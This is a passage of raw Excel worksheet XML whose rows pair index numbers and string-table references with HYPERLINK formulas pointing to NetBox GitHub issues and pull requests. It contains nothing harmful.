        <v>11</v>
      </c>
      <c r="C143" t="s">
        <v>171</v>
      </c>
      <c r="D143" t="s">
        <v>162</v>
      </c>
      <c r="E143" t="str">
        <f>HYPERLINK("https://github.com/netbox-community/netbox/issues/2788", "https://github.com/netbox-community/netbox/issues/2788")</f>
        <v>https://github.com/netbox-community/netbox/issues/2788</v>
      </c>
      <c r="F143" t="s">
        <v>815</v>
      </c>
      <c r="H143" t="s">
        <v>857</v>
      </c>
    </row>
    <row r="144" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A144">
        <v>258</v>
      </c>
      <c r="B144" t="s">
        <v>65</v>
      </c>
      <c r="C144" t="s">
        <v>171</v>
      </c>
      <c r="D144" t="s">
        <v>162</v>
      </c>
      <c r="E144" t="str">
        <f>HYPERLINK("https://github.com/netbox-community/netbox/issues/2788", "https://github.com/netbox-community/netbox/issues/2788")</f>
        <v>https://github.com/netbox-community/netbox/issues/2788</v>
      </c>
      <c r="F144" t="s">
        <v>815</v>
      </c>
      <c r="H144" t="s">
        <v>857</v>
      </c>
    </row>
    <row r="145" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A145">
        <v>261</v>
      </c>
      <c r="B145" t="s">
        <v>172</v>
      </c>
      <c r="C145" t="s">
        <v>173</v>
      </c>
      <c r="D145" t="s">
        <v>162</v>
      </c>
      <c r="E145" t="str">
        <f>HYPERLINK("https://github.com/netbox-community/netbox/issues/2980", "https://github.com/netbox-community/netbox/issues/2980")</f>
        <v>https://github.com/netbox-community/netbox/issues/2980</v>
      </c>
      <c r="F145" s="4" t="s">
        <v>843</v>
      </c>
      <c r="G145" t="s">
        <v>859</v>
      </c>
      <c r="H145" t="s">
        <v>860</v>
      </c>
    </row>
    <row r="146" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A146">
        <v>262</v>
      </c>
      <c r="B146" t="s">
        <v>11</v>
      </c>
      <c r="C146" t="s">
        <v>174</v>
      </c>
      <c r="D146" t="s">
        <v>162</v>
      </c>
      <c r="E146" t="str">
        <f>HYPERLINK("https://github.com/netbox-community/netbox/issues/3469", "https://github.com/netbox-community/netbox/issues/3469")</f>
        <v>https://github.com/netbox-community/netbox/issues/3469</v>
      </c>
      <c r="F146" t="s">
        <v>815</v>
      </c>
      <c r="H146" t="s">
        <v>857</v>
      </c>
    </row>
    <row r="147" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A147">
        <v>263</v>
      </c>
      <c r="B147" t="s">
        <v>65</v>
      </c>
      <c r="C147" t="s">
        <v>174</v>
      </c>
      <c r="D147" t="s">
        <v>162</v>
      </c>
      <c r="E147" t="str">
        <f>HYPERLINK("https://github.com/netbox-community/netbox/issues/3469", "https://github.com/netbox-community/netbox/issues/3469")</f>
        <v>https://github.com/netbox-community/netbox/issues/3469</v>
      </c>
      <c r="F147" t="s">
        <v>815</v>
      </c>
      <c r="H147" t="s">
        <v>857</v>
      </c>
    </row>
    <row r="148" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A148">
        <v>264</v>
      </c>
      <c r="B148" t="s">
        <v>11</v>
      </c>
      <c r="C148" t="s">
        <v>175</v>
      </c>
      <c r="D148" t="s">
        <v>162</v>
      </c>
      <c r="E148" t="str">
        <f>HYPERLINK("https://github.com/netbox-community/netbox/issues/3471", "https://github.com/netbox-community/netbox/issues/3471")</f>
        <v>https://github.com/netbox-community/netbox/issues/3471</v>
      </c>
      <c r="F148" t="s">
        <v>815</v>
      </c>
      <c r="H148" t="s">
        <v>857</v>
      </c>
    </row>
    <row r="149" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A149">
        <v>265</v>
      </c>
      <c r="B149" t="s">
        <v>65</v>
      </c>
      <c r="C149" t="s">
        <v>175</v>
      </c>
      <c r="D149" t="s">
        <v>162</v>
      </c>
      <c r="E149" t="str">
        <f>HYPERLINK("https://github.com/netbox-community/netbox/issues/3471", "https://github.com/netbox-community/netbox/issues/3471")</f>
        <v>https://github.com/netbox-community/netbox/issues/3471</v>
      </c>
      <c r="F149" t="s">
        <v>815</v>
      </c>
      <c r="H149" t="s">
        <v>857</v>
      </c>
    </row>
    <row r="150" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A150">
        <v>266</v>
      </c>
      <c r="B150" t="s">
        <v>11</v>
      </c>
      <c r="C150" t="s">
        <v>176</v>
      </c>
      <c r="D150" t="s">
        <v>162</v>
      </c>
      <c r="E150" t="str">
        <f>HYPERLINK("https://github.com/netbox-community/netbox/issues/4049", "https://github.com/netbox-community/netbox/issues/4049")</f>
        <v>https://github.com/netbox-community/netbox/issues/4049</v>
      </c>
      <c r="F150" t="s">
        <v>815</v>
      </c>
      <c r="H150" t="s">
        <v>857</v>
      </c>
    </row>
    <row r="151" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A151">
        <v>267</v>
      </c>
      <c r="B151" t="s">
        <v>65</v>
      </c>
      <c r="C151" t="s">
        <v>176</v>
      </c>
      <c r="D151" t="s">
        <v>162</v>
      </c>
      <c r="E151" t="str">
        <f>HYPERLINK("https://github.com/netbox-community/netbox/issues/4049", "https://github.com/netbox-community/netbox/issues/4049")</f>
        <v>https://github.com/netbox-community/netbox/issues/4049</v>
      </c>
      <c r="F151" t="s">
        <v>815</v>
      </c>
      <c r="H151" t="s">
        <v>857</v>
      </c>
    </row>
    <row r="152" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A152">
        <v>268</v>
      </c>
      <c r="B152" t="s">
        <v>177</v>
      </c>
      <c r="C152" t="s">
        <v>178</v>
      </c>
      <c r="D152" t="s">
        <v>162</v>
      </c>
      <c r="E152" t="str">
        <f>HYPERLINK("https://github.com/netbox-community/netbox/pull/4122", "https://github.com/netbox-community/netbox/pull/4122")</f>
        <v>https://github.com/netbox-community/netbox/pull/4122</v>
      </c>
      <c r="F152" t="s">
        <v>861</v>
      </c>
      <c r="G152" t="s">
        <v>862</v>
      </c>
      <c r="H152" s="5" t="s">
        <v>863</v>
      </c>
    </row>
    <row r="153" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A153">
        <v>269</v>
      </c>
      <c r="B153" t="s">
        <v>179</v>
      </c>
      <c r="C153" t="s">
        <v>180</v>
      </c>
      <c r="D153" t="s">
        <v>162</v>
      </c>
      <c r="E153" t="str">
        <f>HYPERLINK("https://github.com/netbox-community/netbox/issues/4147", "https://github.com/netbox-community/netbox/issues/4147")</f>
        <v>https://github.com/netbox-community/netbox/issues/4147</v>
      </c>
      <c r="F153" t="s">
        <v>815</v>
      </c>
      <c r="H153" t="s">
        <v>864</v>
      </c>
    </row>
    <row r="154" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A154">
        <v>270</v>
      </c>
      <c r="B154" t="s">
        <v>11</v>
      </c>
      <c r="C154" t="s">
        <v>181</v>
      </c>
      <c r="D154" t="s">
        <v>162</v>
      </c>
      <c r="E154" t="str">
        <f>HYPERLINK("https://github.com/netbox-community/netbox/issues/4272", "https://github.com/netbox-community/netbox/issues/4272")</f>
        <v>https://github.com/netbox-community/netbox/issues/4272</v>
      </c>
      <c r="F154" t="s">
        <v>815</v>
      </c>
      <c r="H154" t="s">
        <v>857</v>
      </c>
    </row>
    <row r="155" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A155">
        <v>271</v>
      </c>
      <c r="B155" t="s">
        <v>65</v>
      </c>
      <c r="C155" t="s">
        <v>182</v>
      </c>
      <c r="D155" t="s">
        <v>162</v>
      </c>
      <c r="E155" t="str">
        <f>HYPERLINK("https://github.com/netbox-community/netbox/issues/4272", "https://github.com/netbox-community/netbox/issues/4272")</f>
        <v>https://github.com/netbox-community/netbox/issues/4272</v>
      </c>
      <c r="F155" t="s">
        <v>815</v>
      </c>
      <c r="H155" t="s">
        <v>857</v>
      </c>
    </row>
    <row r="156" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A156">
        <v>275</v>
      </c>
      <c r="B156" t="s">
        <v>79</v>
      </c>
      <c r="C156" t="s">
        <v>183</v>
      </c>
      <c r="D156" t="s">
        <v>162</v>
      </c>
      <c r="E156" t="str">
        <f>HYPERLINK("https://github.com/netbox-community/netbox/issues/5023", "https://github.com/netbox-community/netbox/issues/5023")</f>
        <v>https://github.com/netbox-community/netbox/issues/5023</v>
      </c>
      <c r="F156" t="s">
        <v>815</v>
      </c>
      <c r="H156" t="s">
        <v>855</v>
      </c>
    </row>
    <row r="157" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A157">
        <v>276</v>
      </c>
      <c r="B157" t="s">
        <v>8</v>
      </c>
      <c r="C157" t="s">
        <v>184</v>
      </c>
      <c r="D157" t="s">
        <v>162</v>
      </c>
      <c r="E157" t="str">
        <f>HYPERLINK("https://github.com/netbox-community/netbox/issues/5023", "https://github.com/netbox-community/netbox/issues/5023")</f>
        <v>https://github.com/netbox-community/netbox/issues/5023</v>
      </c>
      <c r="F157" t="s">
        <v>815</v>
      </c>
      <c r="H157" t="s">
        <v>855</v>
      </c>
    </row>
    <row r="158" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A158">
        <v>277</v>
      </c>
      <c r="B158" t="s">
        <v>11</v>
      </c>
      <c r="C158" t="s">
        <v>185</v>
      </c>
      <c r="D158" t="s">
        <v>162</v>
      </c>
      <c r="E158" t="str">
        <f>HYPERLINK("https://github.com/netbox-community/netbox/issues/5519", "https://github.com/netbox-community/netbox/issues/5519")</f>
        <v>https://github.com/netbox-community/netbox/issues/5519</v>
      </c>
      <c r="F158" t="s">
        <v>815</v>
      </c>
    </row>
    <row r="159" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A159">
        <v>278</v>
      </c>
      <c r="B159" t="s">
        <v>53</v>
      </c>
      <c r="C159" t="s">
        <v>186</v>
      </c>
      <c r="D159" t="s">
        <v>162</v>
      </c>
      <c r="E159" t="str">
        <f>HYPERLINK("https://github.com/netbox-community/netbox/issues/5987", "https://github.com/netbox-community/netbox/issues/5987")</f>
        <v>https://github.com/netbox-community/netbox/issues/5987</v>
      </c>
      <c r="F159" t="s">
        <v>815</v>
      </c>
      <c r="H159" t="s">
        <v>865</v>
      </c>
    </row>
    <row r="160" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A160">
        <v>279</v>
      </c>
      <c r="B160" t="s">
        <v>8</v>
      </c>
      <c r="C160" t="s">
        <v>186</v>
      </c>
      <c r="D160" t="s">
        <v>162</v>
      </c>
      <c r="E160" t="str">
        <f>HYPERLINK("https://github.com/netbox-community/netbox/issues/5987", "https://github.com/netbox-community/netbox/issues/5987")</f>
        <v>https://github.com/netbox-community/netbox/issues/5987</v>
      </c>
      <c r="F160" t="s">
        <v>815</v>
      </c>
      <c r="H160" t="s">
        <v>865</v>
      </c>
    </row>
    <row r="161" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A161">
        <v>280</v>
      </c>
      <c r="B161" t="s">
        <v>79</v>
      </c>
      <c r="C161" t="s">
        <v>186</v>
      </c>
      <c r="D161" t="s">
        <v>162</v>
      </c>
      <c r="E161" t="str">
        <f>HYPERLINK("https://github.com/netbox-community/netbox/issues/5987", "https://github.com/netbox-community/netbox/issues/5987")</f>
        <v>https://github.com/netbox-community/netbox/issues/5987</v>
      </c>
      <c r="F161" t="s">
        <v>815</v>
      </c>
      <c r="H161" t="s">
        <v>865</v>
      </c>
    </row>
    <row r="162" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A162">
        <v>281</v>
      </c>
      <c r="B162" t="s">
        <v>17</v>
      </c>
      <c r="C162" t="s">
        <v>186</v>
      </c>
      <c r="D162" t="s">
        <v>162</v>
      </c>
      <c r="E162" t="str">
        <f>HYPERLINK("https://github.com/netbox-community/netbox/issues/5987", "https://github.com/netbox-community/netbox/issues/5987")</f>
        <v>https://github.com/netbox-community/netbox/issues/5987</v>
      </c>
      <c r="F162" t="s">
        <v>815</v>
      </c>
      <c r="H162" t="s">
        <v>865</v>
      </c>
    </row>
    <row r="163" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A163">
        <v>283</v>
      </c>
      <c r="B163" t="s">
        <v>11</v>
      </c>
      <c r="C163" t="s">
        <v>187</v>
      </c>
      <c r="D163" t="s">
        <v>162</v>
      </c>
      <c r="E163" t="str">
        <f>HYPERLINK("https://github.com/netbox-community/netbox/issues/6267", "https://github.com/netbox-community/netbox/issues/6267")</f>
        <v>https://github.com/netbox-community/netbox/issues/6267</v>
      </c>
      <c r="F163" t="s">
        <v>815</v>
      </c>
      <c r="H163" t="s">
        <v>857</v>
      </c>
    </row>
    <row r="164" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A164">
        <v>284</v>
      </c>
      <c r="B164" t="s">
        <v>65</v>
      </c>
      <c r="C164" t="s">
        <v>188</v>
      </c>
      <c r="D164" t="s">
        <v>162</v>
      </c>
      <c r="E164" t="str">
        <f>HYPERLINK("https://github.com/netbox-community/netbox/issues/6267", "https://github.com/netbox-community/netbox/issues/6267")</f>
        <v>https://github.com/netbox-community/netbox/issues/6267</v>
      </c>
      <c r="F164" t="s">
        <v>815</v>
      </c>
      <c r="H164" t="s">
        <v>857</v>
      </c>
    </row>
    <row r="165" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A165">
        <v>285</v>
      </c>
      <c r="B165" t="s">
        <v>189</v>
      </c>
      <c r="C165" t="s">
        <v>190</v>
      </c>
      <c r="D165" t="s">
        <v>162</v>
      </c>
      <c r="E165" t="str">
        <f>HYPERLINK("https://github.com/netbox-community/netbox/issues/6319", "https://github.com/netbox-community/netbox/issues/6319")</f>
        <v>https://github.com/netbox-community/netbox/issues/6319</v>
      </c>
      <c r="F165" t="s">
        <v>815</v>
      </c>
      <c r="H165" t="s">
        <v>866</v>
      </c>
    </row>
    <row r="166" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A166">
        <v>286</v>
      </c>
      <c r="B166" t="s">
        <v>11</v>
      </c>
      <c r="C166" t="s">
        <v>191</v>
      </c>
      <c r="D166" t="s">
        <v>162</v>
      </c>
      <c r="E166" t="str">
        <f>HYPERLINK("https://github.com/netbox-community/netbox/issues/6338", "https://github.com/netbox-community/netbox/issues/6338")</f>
        <v>https://github.com/netbox-community/netbox/issues/6338</v>
      </c>
      <c r="F166" t="s">
        <v>815</v>
      </c>
      <c r="H166" t="s">
        <v>857</v>
      </c>
    </row>
    <row r="167" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A167">
        <v>287</v>
      </c>
      <c r="B167" t="s">
        <v>65</v>
      </c>
      <c r="C167" t="s">
        <v>191</v>
      </c>
      <c r="D167" t="s">
        <v>162</v>
      </c>
      <c r="E167" t="str">
        <f>HYPERLINK("https://github.com/netbox-community/netbox/issues/6338", "https://github.com/netbox-community/netbox/issues/6338")</f>
        <v>https://github.com/netbox-community/netbox/issues/6338</v>
      </c>
      <c r="F167" t="s">
        <v>815</v>
      </c>
      <c r="H167" t="s">
        <v>857</v>
      </c>
    </row>
    <row r="168" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A168">
        <v>288</v>
      </c>
      <c r="B168" t="s">
        <v>192</v>
      </c>
      <c r="C168" t="s">
        <v>193</v>
      </c>
      <c r="D168" t="s">
        <v>162</v>
      </c>
      <c r="E168" t="str">
        <f>HYPERLINK("https://github.com/netbox-community/netbox/issues/7063", "https://github.com/netbox-community/netbox/issues/7063")</f>
        <v>https://github.com/netbox-community/netbox/issues/7063</v>
      </c>
      <c r="F168" t="s">
        <v>815</v>
      </c>
    </row>
    <row r="169" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A169">
        <v>291</v>
      </c>
      <c r="B169" t="s">
        <v>194</v>
      </c>
      <c r="C169" t="s">
        <v>195</v>
      </c>
      <c r="D169" t="s">
        <v>162</v>
      </c>
      <c r="E169" t="str">
        <f>HYPERLINK("https://github.com/netbox-community/netbox/issues/7451", "https://github.com/netbox-community/netbox/issues/7451")</f>
        <v>https://github.com/netbox-community/netbox/issues/7451</v>
      </c>
      <c r="F169" t="s">
        <v>815</v>
      </c>
      <c r="H169" t="s">
        <v>867</v>
      </c>
    </row>
    <row r="170" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A170">
        <v>292</v>
      </c>
      <c r="B170" t="s">
        <v>172</v>
      </c>
      <c r="C170" t="s">
        <v>195</v>
      </c>
      <c r="D170" t="s">
        <v>162</v>
      </c>
      <c r="E170" t="str">
        <f>HYPERLINK("https://github.com/netbox-community/netbox/issues/7451", "https://github.com/netbox-community/netbox/issues/7451")</f>
        <v>https://github.com/netbox-community/netbox/issues/7451</v>
      </c>
      <c r="F170" t="s">
        <v>815</v>
      </c>
      <c r="H170" t="s">
        <v>867</v>
      </c>
    </row>
    <row r="171" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A171">
        <v>293</v>
      </c>
      <c r="B171" t="s">
        <v>11</v>
      </c>
      <c r="C171" t="s">
        <v>196</v>
      </c>
      <c r="D171" t="s">
        <v>162</v>
      </c>
      <c r="E171" t="str">
        <f>HYPERLINK("https://github.com/netbox-community/netbox/issues/7594", "https://github.com/netbox-community/netbox/issues/7594")</f>
        <v>https://github.com/netbox-community/netbox/issues/7594</v>
      </c>
      <c r="F171" t="s">
        <v>815</v>
      </c>
      <c r="H171" t="s">
        <v>857</v>
      </c>
    </row>
    <row r="172" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A172">
        <v>294</v>
      </c>
      <c r="B172" t="s">
        <v>65</v>
      </c>
      <c r="C172" t="s">
        <v>197</v>
      </c>
      <c r="D172" t="s">
        <v>162</v>
      </c>
      <c r="E172" t="str">
        <f>HYPERLINK("https://github.com/netbox-community/netbox/issues/7594", "https://github.com/netbox-community/netbox/issues/7594")</f>
        <v>https://github.com/netbox-community/netbox/issues/7594</v>
      </c>
      <c r="F172" t="s">
        <v>815</v>
      </c>
      <c r="H172" t="s">
        <v>857</v>
      </c>
    </row>
    <row r="173" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A173">
        <v>295</v>
      </c>
      <c r="B173" t="s">
        <v>11</v>
      </c>
      <c r="C173" t="s">
        <v>198</v>
      </c>
      <c r="D173" t="s">
        <v>162</v>
      </c>
      <c r="E173" t="str">
        <f>HYPERLINK("https://github.com/netbox-community/netbox/issues/7739", "https://github.com/netbox-community/netbox/issues/7739")</f>
        <v>https://github.com/netbox-community/netbox/issues/7739</v>
      </c>
      <c r="F173" t="s">
        <v>815</v>
      </c>
      <c r="H173" t="s">
        <v>857</v>
      </c>
    </row>
    <row r="174" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A174">
        <v>296</v>
      </c>
      <c r="B174" t="s">
        <v>65</v>
      </c>
      <c r="C174" t="s">
        <v>199</v>
      </c>
      <c r="D174" t="s">
        <v>162</v>
      </c>
      <c r="E174" t="str">
        <f>HYPERLINK("https://github.com/netbox-community/netbox/issues/7739", "https://github.com/netbox-community/netbox/issues/7739")</f>
        <v>https://github.com/netbox-community/netbox/issues/7739</v>
      </c>
      <c r="F174" t="s">
        <v>815</v>
      </c>
      <c r="H174" t="s">
        <v>857</v>
      </c>
    </row>
    <row r="175" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A175">
        <v>297</v>
      </c>
      <c r="B175" t="s">
        <v>11</v>
      </c>
      <c r="C175" t="s">
        <v>200</v>
      </c>
      <c r="D175" t="s">
        <v>162</v>
      </c>
      <c r="E175" t="str">
        <f>HYPERLINK("https://github.com/netbox-community/netbox/issues/7887", "https://github.com/netbox-community/netbox/issues/7887")</f>
        <v>https://github.com/netbox-community/netbox/issues/7887</v>
      </c>
      <c r="F175" t="s">
        <v>815</v>
      </c>
      <c r="H175" t="s">
        <v>857</v>
      </c>
    </row>
    <row r="176" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A176">
        <v>298</v>
      </c>
      <c r="B176" t="s">
        <v>65</v>
      </c>
      <c r="C176" t="s">
        <v>201</v>
      </c>
      <c r="D176" t="s">
        <v>162</v>
      </c>
      <c r="E176" t="str">
        <f>HYPERLINK("https://github.com/netbox-community/netbox/issues/7887", "https://github.com/netbox-community/netbox/issues/7887")</f>
        <v>https://github.com/netbox-community/netbox/issues/7887</v>
      </c>
      <c r="F176" t="s">
        <v>815</v>
      </c>
      <c r="H176" t="s">
        <v>857</v>
      </c>
    </row>
    <row r="177" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A177">
        <v>303</v>
      </c>
      <c r="B177" t="s">
        <v>11</v>
      </c>
      <c r="C177" t="s">
        <v>202</v>
      </c>
      <c r="D177" t="s">
        <v>162</v>
      </c>
      <c r="E177" t="str">
        <f>HYPERLINK("https://github.com/netbox-community/netbox/issues/9439", "https://github.com/netbox-community/netbox/issues/9439")</f>
        <v>https://github.com/netbox-community/netbox/issues/9439</v>
      </c>
      <c r="F177" t="s">
        <v>815</v>
      </c>
      <c r="H177" t="s">
        <v>868</v>
      </c>
    </row>
    <row r="178" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A178">
        <v>305</v>
      </c>
      <c r="B178" t="s">
        <v>203</v>
      </c>
      <c r="C178" t="s">
        <v>204</v>
      </c>
      <c r="D178" t="s">
        <v>162</v>
      </c>
      <c r="E178" t="str">
        <f>HYPERLINK("https://github.com/netbox-community/netbox/issues/10043", "https://github.com/netbox-community/netbox/issues/10043")</f>
        <v>https://github.com/netbox-community/netbox/issues/10043</v>
      </c>
      <c r="F178" s="4" t="s">
        <v>843</v>
      </c>
      <c r="G178" t="s">
        <v>870</v>
      </c>
      <c r="H178" s="5" t="s">
        <v>869</v>
      </c>
    </row>
    <row r="179" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A179">
        <v>307</v>
      </c>
      <c r="B179" t="s">
        <v>11</v>
      </c>
      <c r="C179" t="s">
        <v>205</v>
      </c>
      <c r="D179" t="s">
        <v>162</v>
      </c>
      <c r="E179" t="str">
        <f>HYPERLINK("https://github.com/netbox-community/netbox/issues/11167", "https://github.com/netbox-community/netbox/issues/11167")</f>
        <v>https://github.com/netbox-community/netbox/issues/11167</v>
      </c>
      <c r="F179" t="s">
        <v>815</v>
      </c>
      <c r="H179" t="s">
        <v>857</v>
      </c>
    </row>
    <row r="180" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A180">
        <v>308</v>
      </c>
      <c r="B180" t="s">
        <v>65</v>
      </c>
      <c r="C180" t="s">
        <v>206</v>
      </c>
      <c r="D180" t="s">
        <v>162</v>
      </c>
      <c r="E180" t="str">
        <f>HYPERLINK("https://github.com/netbox-community/netbox/issues/11167", "https://github.com/netbox-community/netbox/issues/11167")</f>
        <v>https://github.com/netbox-community/netbox/issues/11167</v>
      </c>
      <c r="F180" t="s">
        <v>815</v>
      </c>
      <c r="H180" t="s">
        <v>857</v>
      </c>
    </row>
    <row r="181" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A181">
        <v>315</v>
      </c>
      <c r="B181" t="s">
        <v>11</v>
      </c>
      <c r="C181" t="s">
        <v>207</v>
      </c>
      <c r="D181" t="s">
        <v>162</v>
      </c>
      <c r="E181" t="str">
        <f>HYPERLINK("https://github.com/netbox-community/netbox/issues/11583", "https://github.com/netbox-community/netbox/issues/11583")</f>
        <v>https://github.com/netbox-community/netbox/issues/11583</v>
      </c>
      <c r="F181" t="s">
        <v>815</v>
      </c>
      <c r="H181" t="s">
        <v>871</v>
      </c>
    </row>
    <row r="182" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A182">
        <v>316</v>
      </c>
      <c r="B182" t="s">
        <v>208</v>
      </c>
      <c r="C182" t="s">
        <v>209</v>
      </c>
      <c r="D182" t="s">
        <v>162</v>
      </c>
      <c r="E182" t="str">
        <f>HYPERLINK("https://github.com/netbox-community/netbox/issues/11625", "https://github.com/netbox-community/netbox/issues/11625")</f>
        <v>https://github.com/netbox-community/netbox/issues/11625</v>
      </c>
      <c r="F182" s="4" t="s">
        <v>874</v>
      </c>
      <c r="G182" t="s">
        <v>873</v>
      </c>
      <c r="H182" s="5" t="s">
        <v>872</v>
      </c>
    </row>
    <row r="183" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A183">
        <v>320</v>
      </c>
      <c r="B183" t="s">
        <v>11</v>
      </c>
      <c r="C183" t="s">
        <v>210</v>
      </c>
      <c r="D183" t="s">
        <v>162</v>
      </c>
      <c r="E183" t="str">
        <f>HYPERLINK("https://github.com/netbox-community/netbox/issues/15085", "https://github.com/netbox-community/netbox/issues/15085")</f>
        <v>https://github.com/netbox-community/netbox/issues/15085</v>
      </c>
      <c r="F183" t="s">
        <v>815</v>
      </c>
      <c r="H183" t="s">
        <v>857</v>
      </c>
    </row>
    <row r="184" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A184">
        <v>327</v>
      </c>
      <c r="B184" t="s">
        <v>11</v>
      </c>
      <c r="C184" t="s">
        <v>211</v>
      </c>
      <c r="D184" t="s">
        <v>162</v>
      </c>
      <c r="E184" t="str">
        <f>HYPERLINK("https://github.com/netbox-community/netbox/issues/16702", "https://github.com/netbox-community/netbox/issues/16702")</f>
        <v>https://github.com/netbox-community/netbox/issues/16702</v>
      </c>
      <c r="F184" t="s">
        <v>815</v>
      </c>
      <c r="H184" t="s">
        <v>857</v>
      </c>
    </row>
    <row r="185" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A185">
        <v>328</v>
      </c>
      <c r="B185" t="s">
        <v>65</v>
      </c>
      <c r="C185" t="s">
        <v>212</v>
      </c>
      <c r="D185" t="s">
        <v>162</v>
      </c>
      <c r="E185" t="str">
        <f>HYPERLINK("https://github.com/netbox-community/netbox/issues/16702", "https://github.com/netbox-community/netbox/issues/16702")</f>
        <v>https://github.com/netbox-community/netbox/issues/16702</v>
      </c>
    </row>
    <row r="186" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A186">
        <v>329</v>
      </c>
      <c r="B186" t="s">
        <v>213</v>
      </c>
      <c r="C186" t="s">
        <v>214</v>
      </c>
      <c r="D186" t="s">
        <v>162</v>
      </c>
      <c r="E186" t="str">
        <f>HYPERLINK("https://github.com/netbox-community/netbox/issues/17112", "https://github.com/netbox-community/netbox/issues/17112")</f>
        <v>https://github.com/netbox-community/netbox/issues/17112</v>
      </c>
    </row>
    <row r="187" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A187">
        <v>330</v>
      </c>
      <c r="B187" t="s">
        <v>79</v>
      </c>
      <c r="C187" t="s">
        <v>214</v>
      </c>
      <c r="D187" t="s">
        <v>162</v>
      </c>
      <c r="E187" t="str">
        <f>HYPERLINK("https://github.com/netbox-community/netbox/issues/17112", "https://github.com/netbox-community/netbox/issues/17112")</f>
        <v>https://github.com/netbox-community/netbox/issues/17112</v>
      </c>
    </row>
    <row r="188" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A188">
        <v>332</v>
      </c>
      <c r="B188" t="s">
        <v>11</v>
      </c>
      <c r="C188" t="s">
        <v>215</v>
      </c>
      <c r="D188" t="s">
        <v>162</v>
      </c>
      <c r="E188" t="str">
        <f>HYPERLINK("https://github.com/netbox-community/netbox/issues/17596", "https://github.com/netbox-community/netbox/issues/17596")</f>
        <v>https://github.com/netbox-community/netbox/issues/17596</v>
      </c>
    </row>
    <row r="189" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A189">
        <v>333</v>
      </c>
      <c r="B189" t="s">
        <v>65</v>
      </c>
      <c r="C189" t="s">
        <v>215</v>
      </c>
      <c r="D189" t="s">
        <v>162</v>
      </c>
      <c r="E189" t="str">
        <f>HYPERLINK("https://github.com/netbox-community/netbox/issues/17596", "https://github.com/netbox-community/netbox/issues/17596")</f>
        <v>https://github.com/netbox-community/netbox/issues/17596</v>
      </c>
    </row>
    <row r="190" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A190">
        <v>334</v>
      </c>
      <c r="B190" t="s">
        <v>216</v>
      </c>
      <c r="C190" t="s">
        <v>217</v>
      </c>
      <c r="D190" t="s">
        <v>162</v>
      </c>
      <c r="E190" t="str">
        <f>HYPERLINK("https://github.com/netbox-community/netbox/pull/18264", "https://github.com/netbox-community/netbox/pull/18264")</f>
        <v>https://github.com/netbox-community/netbox/pull/18264</v>
      </c>
    </row>
    <row r="191" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A191">
        <v>335</v>
      </c>
      <c r="B191" t="s">
        <v>11</v>
      </c>
      <c r="C191" t="s">
        <v>218</v>
      </c>
      <c r="D191" t="s">
        <v>162</v>
      </c>
      <c r="E191" t="str">
        <f>HYPERLINK("https://github.com/netbox-community/netbox/issues/18593", "https://github.com/netbox-community/netbox/issues/18593")</f>
        <v>https://github.com/netbox-community/netbox/issues/18593</v>
      </c>
    </row>
    <row r="192" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A192">
        <v>336</v>
      </c>
      <c r="B192" t="s">
        <v>65</v>
      </c>
      <c r="C192" t="s">
        <v>219</v>
      </c>
      <c r="D192" t="s">
        <v>162</v>
      </c>
      <c r="E192" t="str">
        <f>HYPERLINK("https://github.com/netbox-community/netbox/issues/18593", "https://github.com/netbox-community/netbox/issues/18593")</f>
        <v>https://github.com/netbox-community/netbox/issues/18593</v>
      </c>
    </row>
    <row r="193" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A193">
        <v>337</v>
      </c>
      <c r="B193" t="s">
        <v>177</v>
      </c>
      <c r="C193" t="s">
        <v>220</v>
      </c>
      <c r="D193" t="s">
        <v>162</v>
      </c>
      <c r="E193" t="str">
        <f>HYPERLINK("https://github.com/netbox-community/netbox/issues/19793", "https://github.com/netbox-community/netbox/issues/19793")</f>
        <v>https://github.com/netbox-community/netbox/issues/19793</v>
      </c>
    </row>
    <row r="194" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A194">
        <v>338</v>
      </c>
      <c r="B194" t="s">
        <v>177</v>
      </c>
      <c r="C194" t="s">
        <v>221</v>
      </c>
      <c r="D194" t="s">
